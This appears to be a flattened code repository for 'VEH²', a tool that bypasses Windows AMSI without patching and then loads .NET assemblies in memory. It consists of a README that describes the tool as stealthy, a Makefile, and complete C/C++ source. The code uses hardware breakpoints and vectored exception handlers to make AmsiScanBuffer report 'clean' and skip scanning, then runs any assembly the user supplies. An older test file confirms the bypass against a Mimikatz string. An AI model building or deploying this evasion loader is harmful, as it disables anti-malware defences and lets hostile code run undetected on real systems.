├── .gitignore ├── Makefile ├── README.md ├── VEH2_old.c ├── VEH2.cpp └── dummy.h /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/ -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # cl .\\VEH2_test.cpp /Fe:VEH2_test_Release.exe /O2 /GL /MD /EHsc /D "NDEBUG" /I"C:\\Program Files (x86)\\Windows Kits\\NETFXSDK\\4.8.1\\Include\\um" /link /LTCG /LIBPATH:"C:\\Program Files (x86)\\Windows Kits\\NETFXSDK\\4.8.1\\Lib\\um\\x64" mscoree.lib ole32.lib oleaut32.lib 2 | 3 | 4 | # Makefile for VEH2_test.cpp with MSVC 5 | 6 | # Compiler 7 | CXX = cl 8 | 9 | # Compiler flags for Release build 10 | # /O2 - Optimize for speed 11 | # /GL - Whole Program Optimization 12 | # /MD - Use the multithreaded DLL runtime library (release version) 13 | # /EHsc - Enable C++ exception handling 14 | # /D NDEBUG - Define NDEBUG to disable asserts 15 | CXXFLAGS = /O2 /GL /MD /EHsc /D "NDEBUG" 16 | 17 | # Include paths 18 | # Make sure to adjust the path if your Windows Kits are installed elsewhere 19 | WIN_SDK_PATH = C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8.1 20 | INCLUDES = /I"$(WIN_SDK_PATH)\Include\um" 21 | 22 | # Linker flags 23 | # /LTCG - Link-Time Code Generation 24 | LDFLAGS = /LTCG 25 | 26 | # Libraries and library paths 27 | LIBPATH = /LIBPATH:"$(WIN_SDK_PATH)\Lib\um\x64" 28 | LIBS = mscoree.lib ole32.lib oleaut32.lib 29 | 30 | # Build directory 31 | BUILD_DIR = build 32 | 33 | # Source, Object, and Target 34 | SRC = VEH2_test.cpp 35 | OBJ = $(BUILD_DIR)\$(SRC:.cpp=.obj) 36 | TARGET = $(BUILD_DIR)\$(TARGET_NAME) 37 | TARGET_NAME = VEH2_Release.exe 38 | 39 | # Default target: Create the build directory and then the executable 40 | all: $(TARGET) 41 | 42 | # Linking: Create the executable from the object file 43 | $(TARGET): $(OBJ) 44 | $(CXX) $^ /Fe:$@ /link $(LDFLAGS) $(LIBPATH) $(LIBS) 45 | 46 | # Compiling: Create the object file from the source file 47 | $(OBJ): $(SRC) 48 | @if not exist $(BUILD_DIR) mkdir $(BUILD_DIR) 49 | $(CXX) $(CXXFLAGS) $(INCLUDES) /c $< /Fo$@ 50 | 51 | # Clean up all build artifacts 52 | clean: 53 | @if exist $(BUILD_DIR) rd /s /q $(BUILD_DIR) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # VEH²: A Patchless AMSI Bypass & In-Memory .NET Loader 2 | 3 | This repository contains the source code for an advanced implementation of the VEH² (Vectored Exception Handling²) technique. This tool functions as a sophisticated loader that can execute .NET assemblies directly from memory, while bypassing the Anti-Malware Scan Interface (AMSI) without patching the `AmsiScanBuffer` function. 4 | 5 | ## Key Features 6 | 7 | * **Patchless AMSI Bypass**: Utilizes a double Vectored Exception Handler (VEH) setup to intercept and neutralize AMSI scans at runtime. 8 | * **.NET CLR Hosting**: Hosts the Common Language Runtime (CLR) from a native C++ process, allowing it to load and manage .NET code. 9 | * **In-Memory Assembly Execution**: Reads a target .NET assembly from disk into a memory buffer and executes it from there, avoiding direct execution from the file that resides on disk. 10 | * **Stealthy Module Loading**: Forces `amsi.dll` into the process's address space by loading a sacrificial, embedded dummy assembly. This allows the tool to find the `AmsiScanBuffer` address without making a potentially monitored `LoadLibrary` call. 11 | 12 | ## The Technique: Step-by-Step 13 | 14 | 1. **CLR and AMSI Initialization**: 15 | * The program first hosts the .NET CLR. 16 | * It then loads a tiny, embedded sacrificial .NET assembly from a byte array. The sole purpose of this action is to trigger the CLR to load `amsi.dll` into the process. 17 | * With `amsi.dll` now in memory, the program dynamically resolves the address of `AmsiScanBuffer` using `GetModuleHandle`. 18 | * Two Vectored Exception Handlers (VEHs) are registered: **VEH1** for `EXCEPTION_BREAKPOINT` and **VEH2** for `EXCEPTION_SINGLE_STEP`. 19 | 20 | 2. **Arming the Bypass**: 21 | * The program intentionally triggers a breakpoint using `DebugBreak()`. 22 | * This invokes **VEH1**, which sets a hardware breakpoint on the `AmsiScanBuffer` function's address by modifying the debug registers (Dr0-Dr7). 23 | 24 | 3. **Triggering the Bypass**: 25 | * The user-specified .NET assembly is read from disk into a memory buffer. 26 | * The program instructs the CLR to load this assembly from the memory buffer. 27 | * As the CLR prepares to execute the code, it first attempts to scan the memory buffer for malicious content by calling `AmsiScanBuffer`. 28 | * The instant the CPU tries to execute `AmsiScanBuffer`, the hardware breakpoint is triggered, raising an `EXCEPTION_SINGLE_STEP`. 29 | * This exception invokes **VEH2**. 30 | 31 | 4. **The Bypass Execution**: 32 | * Inside **VEH2**, the magic happens: 33 | * The hardware breakpoint is cleared to prevent an infinite loop. 34 | * The return value of `AmsiScanBuffer` (in the `RAX` register) is set to `S_OK` (0). 35 | * The `amsiResult` parameter on the stack is set to `AMSI_RESULT_CLEAN`. 36 | * The instruction pointer (`RIP`) is manipulated to skip the entire `AmsiScanBuffer` function, jumping directly to its return address. 37 | * Execution continues as if `AmsiScanBuffer` had run and found nothing malicious. The user's assembly is then executed. 38 | 39 | This method is considered "patchless" because it doesn't alter the code of `AmsiScanBuffer` itself, making it potentially stealthier than traditional patching techniques. 40 | 41 | ## Building and Running 42 | 43 | This project is configured to be built with the Microsoft Visual C++ compiler (`cl.exe`) and `nmake`. You will need to have the Visual Studio Build Tools or a full Visual Studio installation with the C++ toolchain. 44 | 45 | ### Build 46 | Open a developer command prompt (like the "x64 Native Tools Command Prompt for VS") and run: 47 | ```sh 48 | nmake 49 | ``` 50 | This will create a `build` directory and place the `VEH2_Release.exe` executable inside it. 51 | 52 | ### Clean 53 | To remove all build artifacts, run: 54 | ```sh 55 | nmake clean 56 | ``` 57 | 58 | ### Execution 59 | Execute the compiled program, passing the path to the .NET assembly you wish to load as an argument. 60 | ```sh 61 | .\build\VEH2_Release.exe C:\path\to\your\assembly.exe 62 | ``` 63 | 64 | ## Reference 65 | The core bypass technique was described in detail by CrowdStrike: 66 | [CrowdStrike Blog: Investigating the Threat of Patchless AMSI Bypass Attacks](https://www.crowdstrike.com/en-us/blog/crowdstrike-investigates-threat-of-patchless-amsi-bypass-attacks/) 67 | 68 | ![CrowdStrike Diagram](https://www.crowdstrike.com/en-us/blog/crowdstrike-investigates-threat-of-patchless-amsi-bypass-attacks/_jcr_content/root/container/container/container/image_copy_copy_copy_314958831/.coreimg.png/1750175626115/blog-amsi-11.png) -------------------------------------------------------------------------------- /VEH2_old.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | PVOID pAmsiScanBuffer = NULL; 5 | 6 | typedef enum AMSI_RESULT { 7 | AMSI_RESULT_CLEAN, 8 | AMSI_RESULT_NOT_DETECTED, 9 | AMSI_RESULT_BLOCKED_BY_ADMIN_START, 10 | AMSI_RESULT_BLOCKED_BY_ADMIN_END, 11 | AMSI_RESULT_DETECTED 12 | } AMSI_RESULT; 13 | 14 | // Structure pour les flags du registre DR7 15 | typedef union { 16 | DWORD_PTR value; 17 | struct { 18 | DWORD L0 : 1; // Local breakpoint 0 19 | DWORD G0 : 1; // Global breakpoint 0 20 | DWORD L1 : 1; // Local breakpoint 1 21 | DWORD G1 : 1; // Global breakpoint 1 22 | DWORD L2 : 1; // Local breakpoint 2 23 | DWORD G2 : 1; // Global breakpoint 2 24 | DWORD L3 : 1; // Local breakpoint 3 25 | DWORD G3 : 1; // Global breakpoint 3 26 | DWORD LE : 1; // Local exact breakpoint 27 | DWORD GE : 1; // Global exact breakpoint 28 | DWORD Reserved1 : 3; 29 | DWORD GD : 1; // General detect 30 | DWORD Reserved2 : 2; 31 | DWORD RW0 : 2; // Read/Write field for BP0 32 | DWORD LEN0 : 2; // Length field for BP0 33 | DWORD RW1 : 2; // Read/Write field for BP1 34 | DWORD LEN1 : 2; // Length field for BP1 35 | DWORD RW2 : 2; // Read/Write field for BP2 36 | DWORD LEN2 : 2; // Length field for BP2 37 | DWORD RW3 : 2; // Read/Write field for BP3 38 | DWORD LEN3 : 2; // Length field for BP3 39 | }; 40 | } DR7_FLAGS; 41 | 42 | void setHardwareBreakpoint(PCONTEXT pContext, int bpIndex, void* address, int type, int size) { 43 | 44 | if (bpIndex < 0 || bpIndex > 3) { 45 | return; 46 | } 47 | 48 | switch (bpIndex) { 49 | case 0: 50 | pContext->Dr0 = (DWORD_PTR)address; 51 | break; 52 | case 1: 53 | pContext->Dr1 = (DWORD_PTR)address; 54 | break; 55 | case 2: 56 | pContext->Dr2 = (DWORD_PTR)address; 57 | break; 58 | case 3: 59 | pContext->Dr3 = (DWORD_PTR)address; 60 | break; 61 | } 62 | 63 | DR7_FLAGS dr7; 64 | dr7.value = pContext->Dr7; 65 | switch (bpIndex) { 66 | case 0: 67 | dr7.L0 = 1; 68 | dr7.RW0 = type; 69 | dr7.LEN0 = size; 70 | break; 71 | case 1: 72 | dr7.L1 = 1; 73 | dr7.RW1 = type; 74 | dr7.LEN1 = size; 75 | break; 76 | case 2: 77 | dr7.L2 = 1; 78 | dr7.RW2 = type; 79 | dr7.LEN2 = size; 80 | break; 81 | case 3: 82 | dr7.L3 = 1; 83 | dr7.RW3 = type; 84 | dr7.LEN3 = size; 85 | break; 86 | } 87 | pContext->Dr7 = dr7.value; 88 | } 89 | 90 | void clearHardwareBreakpoint(PCONTEXT pContext, int bpIndex) { 91 | if (bpIndex < 0 || bpIndex > 3) { 92 | return; 93 | } 94 | 95 | DR7_FLAGS dr7; 96 | dr7.value = pContext->Dr7; 97 | 98 | switch (bpIndex) { 99 | case 0: 100 | pContext->Dr0 = 0; 101 | dr7.L0 = 0; 102 | dr7.RW0 = 0; 103 | dr7.LEN0 = 0; 104 | break; 105 | case 1: 106 | pContext->Dr1 = 0; 107 | dr7.L1 = 0; 108 | dr7.RW1 = 0; 109 | dr7.LEN1 = 0; 110 | break; 111 | case 2: 112 | pContext->Dr2 = 0; 113 | dr7.L2 = 0; 114 | dr7.RW2 = 0; 115 | dr7.LEN2 = 0; 116 | break; 117 | case 3: 118 | pContext->Dr3 = 0; 119 | dr7.L3 = 0; 120 | dr7.RW3 = 0; 121 | dr7.LEN3 = 0; 122 | break; 123 | } 124 | pContext->Dr7 = dr7.value; 125 | } 126 | 127 | LONG WINAPI Handler(PEXCEPTION_POINTERS ExceptionInfo) { 128 | printf("[VEH1] DebugBreakVEH\n"); 129 | 130 | PEXCEPTION_RECORD ExceptionRecord = ExceptionInfo->ExceptionRecord; 131 | if (ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) { 132 | printf("[VEH1] ExceptionCode: EXCEPTION_BREAKPOINT\n"); 133 | 134 | printf("[VEH1] Setting hardware breakpoint on AmsiScanBuffer: %p\n", pAmsiScanBuffer); 135 | 136 | setHardwareBreakpoint(ExceptionInfo->ContextRecord, 0, (void*)pAmsiScanBuffer, 0, 0); 137 | 138 | // Manually advance the instruction pointer to the next instruction 139 | ExceptionInfo->ContextRecord->Rip++; 140 | 141 | return EXCEPTION_CONTINUE_EXECUTION; 142 | } 143 | 144 | return EXCEPTION_CONTINUE_SEARCH; 145 | } 146 | 147 | LONG WINAPI AmsiScanBufferVEH(PEXCEPTION_POINTERS ExceptionInfo) { 148 | printf("[VEH2] AmsiScanBufferVEH\n"); 149 | 150 | if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) { 151 | printf("[VEH2] ExceptionCode: EXCEPTION_SINGLE_STEP\n"); 152 | 153 | if (ExceptionInfo->ExceptionRecord->ExceptionAddress == pAmsiScanBuffer) { 154 | printf("[VEH2] Hardware breakpoint hit on AmsiScanBuffer\n"); 155 | 156 | // Clear the hardware breakpoint 157 | clearHardwareBreakpoint(ExceptionInfo->ContextRecord, 0); 158 | 159 | // Set return value to S_OK (0) 160 | ExceptionInfo->ContextRecord->Rax = 0; 161 | 162 | // Set amsiResult to AMSI_RESULT_CLEAN 163 | AMSI_RESULT* amsiResult = (AMSI_RESULT*) *( (DWORD_PTR*) (ExceptionInfo->ContextRecord->Rsp + 0x30) ); 164 | *amsiResult = AMSI_RESULT_CLEAN; 165 | printf("[VEH2] Patched AmsiScanBuffer result to: %d\n", *amsiResult); 166 | 167 | // Skip AmsiScanBuffer execution 168 | ExceptionInfo->ContextRecord->Rip = *( (DWORD_PTR*) ExceptionInfo->ContextRecord->Rsp); 169 | ExceptionInfo->ContextRecord->Rsp += 8; 170 | 171 | return EXCEPTION_CONTINUE_EXECUTION; 172 | } 173 | } 174 | 175 | return EXCEPTION_CONTINUE_SEARCH; 176 | } 177 | 178 | int main() { 179 | LoadLibraryA("amsi.dll"); 180 | pAmsiScanBuffer = GetProcAddress(GetModuleHandleA("amsi.dll"), "AmsiScanBuffer"); 181 | printf("AmsiScanBuffer address: %p\n", pAmsiScanBuffer); 182 | 183 | // Register two VEHs (thus the name VEH²) using AddVectoredExceptionHandler: 184 | PVOID VEH1 = AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)Handler); 185 | PVOID VEH2 = AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)AmsiScanBufferVEH); 186 | 187 | printf("Press Enter to trigger DebugBreak...\n"); 188 | getchar(); 189 | 190 | //DebugBreak(); 191 | 192 | AMSI_RESULT result = AMSI_RESULT_DETECTED; // Initially detected 193 | 194 | printf("Calling AmsiScanBuffer with a malicious string...\n"); 195 | HRESULT hr = ((HRESULT(*)(PVOID, PVOID, ULONG, PCWSTR, PVOID, PVOID))pAmsiScanBuffer)(NULL, (PVOID)"Invoke-Mimikatz", 9, L"AMSI_BYPASS_TEST", NULL, &result); 196 | printf("AmsiScanBuffer HRESULT: 0x%x\n", hr); 197 | printf("AmsiScanBuffer result: %d (0=clean, 1=not_detected, ... 4=detected)\n", result); 198 | 199 | if (result == AMSI_RESULT_CLEAN) { 200 | printf("AMSI bypass successful!\n"); 201 | } else { 202 | printf("AMSI bypass failed.\n"); 203 | } 204 | 205 | // Unregister VEHs 206 | RemoveVectoredExceptionHandler(VEH2); 207 | RemoveVectoredExceptionHandler(VEH1); 208 | 209 | return 0; 210 | } -------------------------------------------------------------------------------- /VEH2.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "dummy.h" 9 | 10 | #pragma comment(lib, "mscoree.lib") 11 | 12 | #import "mscorlib.tlb" raw_interfaces_only \ 13 | high_property_prefixes("_get", "_put", "_putref") \ 14 | rename("ReportEvent", "InteropServices_ReportEvent") 15 | 16 | using namespace mscorlib; 17 | 18 | PVOID pAmsiScanBuffer = nullptr; 19 | 20 | typedef enum AMSI_RESULT { 21 | AMSI_RESULT_CLEAN, 22 | AMSI_RESULT_NOT_DETECTED, 23 | AMSI_RESULT_BLOCKED_BY_ADMIN_START, 24 | AMSI_RESULT_BLOCKED_BY_ADMIN_END, 25 | AMSI_RESULT_DETECTED 26 | } AMSI_RESULT; 27 | 28 | // Structure for DR7 register flags 29 | typedef union { 30 | DWORD_PTR value; 31 | struct { 32 | DWORD L0 : 1; // Local breakpoint 0 33 | DWORD G0 : 1; // Global breakpoint 0 34 | DWORD L1 : 1; // Local breakpoint 1 35 | DWORD G1 : 1; // Global breakpoint 1 36 | DWORD L2 : 1; // Local breakpoint 2 37 | DWORD G2 : 1; // Global breakpoint 2 38 | DWORD L3 : 1; // Local breakpoint 3 39 | DWORD G3 : 1; // Global breakpoint 3 40 | DWORD LE : 1; // Local exact breakpoint 41 | DWORD GE : 1; // Global exact breakpoint 42 | DWORD Reserved1 : 3; 43 | DWORD GD : 1; // General detect 44 | DWORD Reserved2 : 2; 45 | DWORD RW0 : 2; // Read/Write field for BP0 46 | DWORD LEN0 : 2; // Length field for BP0 47 | DWORD RW1 : 2; // Read/Write field for BP1 48 | DWORD LEN1 : 2; // Length field for BP1 49 | DWORD RW2 : 2; // Read/Write field for BP2 50 | DWORD LEN2 : 2; // Length field for BP2 51 | DWORD RW3 : 2; // Read/Write field for BP3 52 | DWORD LEN3 : 2; // Length field for BP3 53 | }; 54 | } DR7_FLAGS; 55 | 56 | void setHardwareBreakpoint(PCONTEXT pContext, int bpIndex, void* address, int type, int size) { 57 | 58 | if (bpIndex < 0 || bpIndex > 3) { 59 | return; 60 | } 61 | 62 | switch (bpIndex) { 63 | case 0: 64 | pContext->Dr0 = reinterpret_cast(address); 65 | break; 66 | case 1: 67 | pContext->Dr1 = reinterpret_cast(address); 68 | break; 69 | case 2: 70 | pContext->Dr2 = reinterpret_cast(address); 71 | break; 72 | case 3: 73 | pContext->Dr3 = reinterpret_cast(address); 74 | break; 75 | } 76 | 77 | DR7_FLAGS dr7; 78 | dr7.value = pContext->Dr7; 79 | switch (bpIndex) { 80 | case 0: 81 | dr7.L0 = 1; 82 | dr7.RW0 = type; 83 | dr7.LEN0 = size; 84 | break; 85 | case 1: 86 | dr7.L1 = 1; 87 | dr7.RW1 = type; 88 | dr7.LEN1 = size; 89 | break; 90 | case 2: 91 | dr7.L2 = 1; 92 | dr7.RW2 = type; 93 | dr7.LEN2 = size; 94 | break; 95 | case 3: 96 | dr7.L3 = 1; 97 | dr7.RW3 = type; 98 | dr7.LEN3 = size; 99 | break; 100 | } 101 | pContext->Dr7 = dr7.value; 102 | } 103 | 104 | void clearHardwareBreakpoint(PCONTEXT pContext, int bpIndex) { 105 | if (bpIndex < 0 || bpIndex > 3) { 106 | return; 107 | } 108 | 109 | DR7_FLAGS dr7; 110 | dr7.value = pContext->Dr7; 111 | 112 | switch (bpIndex) { 113 | case 0: 114 | pContext->Dr0 = 0; 115 | dr7.L0 = 0; 116 | dr7.RW0 = 0; 117 | dr7.LEN0 = 0; 118 | break; 119 | case 1: 120 | pContext->Dr1 = 0; 121 | dr7.L1 = 0; 122 | dr7.RW1 = 0; 123 | dr7.LEN1 = 0; 124 | break; 125 | case 2: 126 | pContext->Dr2 = 0; 127 | dr7.L2 = 0; 128 | dr7.RW2 = 0; 129 | dr7.LEN2 = 0; 130 | break; 131 | case 3: 132 | pContext->Dr3 = 0; 133 | dr7.L3 = 0; 134 | dr7.RW3 = 0; 135 | dr7.LEN3 = 0; 136 | break; 137 | } 138 | pContext->Dr7 = dr7.value; 139 | } 140 | 141 | LONG WINAPI Handler(PEXCEPTION_POINTERS ExceptionInfo) { 142 | printf("[VEH1] DebugBreakVEH\n"); 143 | 144 | PEXCEPTION_RECORD ExceptionRecord = ExceptionInfo->ExceptionRecord; 145 | if (ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) { 146 | printf("[VEH1] ExceptionCode: EXCEPTION_BREAKPOINT\n"); 147 | 148 | printf("[VEH1] Setting hardware breakpoint on AmsiScanBuffer: %p\n", pAmsiScanBuffer); 149 | 150 | setHardwareBreakpoint(ExceptionInfo->ContextRecord, 0, pAmsiScanBuffer, 0, 0); 151 | 152 | // Manually advance the instruction pointer to the next instruction 153 | ExceptionInfo->ContextRecord->Rip++; 154 | 155 | return EXCEPTION_CONTINUE_EXECUTION; 156 | } 157 | 158 | return EXCEPTION_CONTINUE_SEARCH; 159 | } 160 | 161 | LONG WINAPI AmsiScanBufferVEH(PEXCEPTION_POINTERS ExceptionInfo) { 162 | printf("[VEH2] AmsiScanBufferVEH\n"); 163 | 164 | if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) { 165 | printf("[VEH2] ExceptionCode: EXCEPTION_SINGLE_STEP\n"); 166 | 167 | if (ExceptionInfo->ExceptionRecord->ExceptionAddress == pAmsiScanBuffer) { 168 | printf("[VEH2] Hardware breakpoint hit on AmsiScanBuffer\n"); 169 | 170 | // Clear the hardware breakpoint 171 | clearHardwareBreakpoint(ExceptionInfo->ContextRecord, 0); 172 | 173 | // Set return value to S_OK (0) 174 | ExceptionInfo->ContextRecord->Rax = 0; 175 | 176 | // Set amsiResult to AMSI_RESULT_CLEAN 177 | AMSI_RESULT* amsiResult = reinterpret_cast( *reinterpret_cast(ExceptionInfo->ContextRecord->Rsp + 0x30) ); 178 | *amsiResult = AMSI_RESULT_CLEAN; 179 | printf("[VEH2] Patched AmsiScanBuffer result to: %d\n", *amsiResult); 180 | 181 | // Skip AmsiScanBuffer execution 182 | ExceptionInfo->ContextRecord->Rip = *reinterpret_cast(ExceptionInfo->ContextRecord->Rsp); 183 | ExceptionInfo->ContextRecord->Rsp += 8; 184 | 185 | return EXCEPTION_CONTINUE_EXECUTION; 186 | } 187 | } 188 | 189 | return EXCEPTION_CONTINUE_SEARCH; 190 | } 191 | 192 | // Function pointer type for AmsiScanBuffer, matching the real signature 193 | using AmsiScanBuffer_t = HRESULT(WINAPI *)(PVOID, PVOID, ULONG, PCWSTR, PVOID, AMSI_RESULT*); 194 | 195 | int wmain(int argc, wchar_t* argv[]) { 196 | if (argc < 2) { 197 | wprintf(L"Usage: %s \n", argv[0]); 198 | return 1; 199 | } 200 | 201 | HRESULT hr; 202 | ICLRMetaHost* pMetaHost = nullptr; 203 | ICLRRuntimeInfo* pRuntimeInfo = nullptr; 204 | ICorRuntimeHost* pCorRuntimeHost = nullptr; 205 | IUnknown* pAppDomainThunk = nullptr; 206 | _AppDomain* pDefaultAppDomain = nullptr; 207 | PVOID VEH1 = nullptr; 208 | PVOID VEH2 = nullptr; 209 | _Assembly* pAssembly = nullptr; 210 | _MethodInfo* pMethodInfo = nullptr; 211 | char* assemblyBytes = nullptr; 212 | SAFEARRAY* pSafeArrayOfBytes = nullptr; 213 | std::streamsize size = 0; 214 | 215 | // Step 1: Host the CLR up to the point of getting the AppDomain 216 | wprintf(L"[+] Hosting CLR...\n"); 217 | hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_PPV_ARGS(&pMetaHost)); 218 | if (FAILED(hr)) { 219 | wprintf(L"[x] CLRCreateInstance failed: 0x%08X\n", hr); 220 | goto cleanup; 221 | } 222 | 223 | hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_PPV_ARGS(&pRuntimeInfo)); 224 | if (FAILED(hr)) { 225 | wprintf(L"[x] GetRuntime failed: 0x%08X\n", hr); 226 | goto cleanup; 227 | } 228 | 229 | BOOL bLoadable; 230 | hr = pRuntimeInfo->IsLoadable(&bLoadable); 231 | if (FAILED(hr) || !bLoadable) { 232 | wprintf(L"[x] CLR not loadable\n"); 233 | goto cleanup; 234 | } 235 | 236 | hr = pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_PPV_ARGS(&pCorRuntimeHost)); 237 | if (FAILED(hr)) { 238 | wprintf(L"[x] GetInterface failed: 0x%08X\n", hr); 239 | goto cleanup; 240 | } 241 | 242 | hr = pCorRuntimeHost->Start(); 243 | if (FAILED(hr)) { 244 | wprintf(L"[x] CLR Start failed: 0x%08X\n", hr); 245 | goto cleanup; 246 | } 247 | 248 | hr = pCorRuntimeHost->GetDefaultDomain(&pAppDomainThunk); 249 | if (FAILED(hr)) { 250 | wprintf(L"[x] GetDefaultDomain failed: 0x%08X\n", hr); 251 | goto cleanup; 252 | } 253 | 254 | hr = pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (void**)&pDefaultAppDomain); 255 | if (FAILED(hr)) { 256 | wprintf(L"[x] QueryInterface failed: 0x%08X\n", hr); 257 | goto cleanup; 258 | } 259 | 260 | // --- Pre-flight: Load a dummy assembly to force amsi.dll into memory --- 261 | wprintf(L"[+] Pre-flight: Loading dummy assembly to trigger CLR and load amsi.dll...\n"); 262 | std::cout << "Press Enter to continue..." << std::endl; 263 | getchar(); 264 | { 265 | _Assembly* pDummyAssembly = nullptr; 266 | _MethodInfo* pDummyMethodInfo = nullptr; 267 | SAFEARRAY* pDummySafeArray = SafeArrayCreateVector(VT_UI1, 0, sizeof(dummyAMSIload_exe)); 268 | 269 | if (pDummySafeArray) { 270 | void* pDummyData; 271 | SafeArrayAccessData(pDummySafeArray, &pDummyData); 272 | memcpy(pDummyData, dummyAMSIload_exe, sizeof(dummyAMSIload_exe)); 273 | SafeArrayUnaccessData(pDummySafeArray); 274 | 275 | if (SUCCEEDED(pDefaultAppDomain->Load_3(pDummySafeArray, &pDummyAssembly))) { 276 | if (SUCCEEDED(pDummyAssembly->get_EntryPoint(&pDummyMethodInfo)) && pDummyMethodInfo) { 277 | VARIANT dummyObj, dummyRetVal; 278 | dummyObj.vt = VT_NULL; 279 | SAFEARRAY* pDummyArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0); 280 | pDummyMethodInfo->Invoke_3(dummyObj, pDummyArgs, &dummyRetVal); 281 | SafeArrayDestroy(pDummyArgs); 282 | pDummyMethodInfo->Release(); 283 | } 284 | pDummyAssembly->Release(); 285 | } 286 | SafeArrayDestroy(pDummySafeArray); 287 | } 288 | } 289 | // --- End of Pre-flight --- 290 | std::cout << "Dummy assembly loaded. Press Enter to continue..." << std::endl; 291 | getchar(); 292 | 293 | // Step 2: Now that the CLR is hosted, try to find amsi.dll 294 | wprintf(L"[+] CLR Hosted. Searching for amsi.dll...\n"); 295 | HMODULE hAmsi = GetModuleHandleA("amsi.dll"); 296 | if (!hAmsi) { 297 | wprintf(L"[x] amsi.dll still not found after dummy load. The technique may not work on this system.\n"); 298 | goto cleanup; 299 | } 300 | 301 | pAmsiScanBuffer = GetProcAddress(hAmsi, "AmsiScanBuffer"); 302 | if (!pAmsiScanBuffer) { 303 | wprintf(L"[x] AmsiScanBuffer not found in amsi.dll.\n"); 304 | goto cleanup; 305 | } 306 | printf("[+] AmsiScanBuffer address found at: %p\n", pAmsiScanBuffer); 307 | 308 | // Step 3: Set up the VEH patch 309 | VEH1 = AddVectoredExceptionHandler(1, reinterpret_cast(Handler)); 310 | VEH2 = AddVectoredExceptionHandler(1, reinterpret_cast(AmsiScanBufferVEH)); 311 | 312 | printf("[+] Press Enter to trigger DebugBreak to arm the patch...\n"); 313 | getchar(); 314 | 315 | DebugBreak(); 316 | 317 | // Step 4: Read assembly from disk into memory 318 | { 319 | wprintf(L"[+] Reading assembly %s into memory...\n", argv[1]); 320 | std::ifstream file(argv[1], std::ios::binary | std::ios::ate); 321 | if (!file.is_open()) { 322 | wprintf(L"[x] Failed to open assembly file.\n"); 323 | goto cleanup; 324 | } 325 | 326 | size = file.tellg(); 327 | file.seekg(0, std::ios::beg); 328 | 329 | assemblyBytes = new char[size]; 330 | if (!file.read(assemblyBytes, size)) { 331 | wprintf(L"[x] Failed to read assembly file into buffer.\n"); 332 | goto cleanup; 333 | } 334 | } 335 | 336 | // Step 5: Load assembly from memory and execute 337 | if (size == 0) { 338 | wprintf(L"[x] Assembly file is empty or could not be read.\n"); 339 | goto cleanup; 340 | } 341 | 342 | pSafeArrayOfBytes = SafeArrayCreateVector(VT_UI1, 0, size); 343 | if (!pSafeArrayOfBytes) { 344 | wprintf(L"[x] SafeArrayCreateVector failed.\n"); 345 | goto cleanup; 346 | } 347 | 348 | void* pData; 349 | SafeArrayAccessData(pSafeArrayOfBytes, &pData); 350 | memcpy(pData, assemblyBytes, size); 351 | SafeArrayUnaccessData(pSafeArrayOfBytes); 352 | delete[] assemblyBytes; 353 | assemblyBytes = nullptr; // Ownership transferred or deleted 354 | 355 | wprintf(L"[+] Loading assembly from memory...\n"); 356 | // This is where AMSI should be triggered for the memory buffer 357 | hr = pDefaultAppDomain->Load_3(pSafeArrayOfBytes, &pAssembly); 358 | SafeArrayDestroy(pSafeArrayOfBytes); // Clean up the byte array now 359 | pSafeArrayOfBytes = nullptr; 360 | 361 | if (FAILED(hr)) { 362 | wprintf(L"[x] Load_3 (loading from memory) failed: 0x%08X\n", hr); 363 | goto cleanup; 364 | } 365 | 366 | hr = pAssembly->get_EntryPoint(&pMethodInfo); 367 | if (FAILED(hr) || !pMethodInfo) { 368 | wprintf(L"[x] get_EntryPoint failed: 0x%08X\n", hr); 369 | goto cleanup; 370 | } 371 | 372 | // Prepare arguments for Main(string[] args) - we pass an empty array 373 | SAFEARRAY* pArgs = SafeArrayCreateVector(VT_VARIANT, 0, 1); 374 | VARIANT vArgs; 375 | vArgs.vt = VT_ARRAY | VT_BSTR; 376 | vArgs.parray = SafeArrayCreateVector(VT_BSTR, 0, 0); 377 | SafeArrayPutElement(pArgs, (LONG*)new LONG{0}, &vArgs); 378 | 379 | VARIANT obj; 380 | obj.vt = VT_NULL; 381 | VARIANT retVal; 382 | 383 | wprintf(L"[+] Invoking assembly entry point...\n"); 384 | hr = pMethodInfo->Invoke_3(obj, pArgs, &retVal); 385 | 386 | SafeArrayDestroy(pArgs); 387 | VariantClear(&vArgs); 388 | 389 | if (FAILED(hr)) { 390 | wprintf(L"[x] Invoke_3 failed: 0x%08X\n", hr); 391 | } else { 392 | wprintf(L"[+] Assembly executed successfully from memory.\n"); 393 | } 394 | 395 | getchar(); 396 | 397 | cleanup: 398 | // Unregister VEHs 399 | if (VEH2) RemoveVectoredExceptionHandler(VEH2); 400 | if (VEH1) RemoveVectoredExceptionHandler(VEH1); 401 | 402 | // Release COM objects 403 | if (pMethodInfo) pMethodInfo->Release(); 404 | if (pAssembly) pAssembly->Release(); 405 | if (pDefaultAppDomain) pDefaultAppDomain->Release(); 406 | if (pAppDomainThunk) pAppDomainThunk->Release(); 407 | if (pCorRuntimeHost) pCorRuntimeHost->Release(); 408 | if (pRuntimeInfo) pRuntimeInfo->Release(); 409 | if (pMetaHost) pMetaHost->Release(); 410 | 411 | // Cleanup memory and arrays 412 | if (assemblyBytes) delete[] assemblyBytes; 413 | if (pSafeArrayOfBytes) SafeArrayDestroy(pSafeArrayOfBytes); 414 | 415 | return 0; 416 | } -------------------------------------------------------------------------------- /dummy.h: -------------------------------------------------------------------------------- 1 | unsigned char 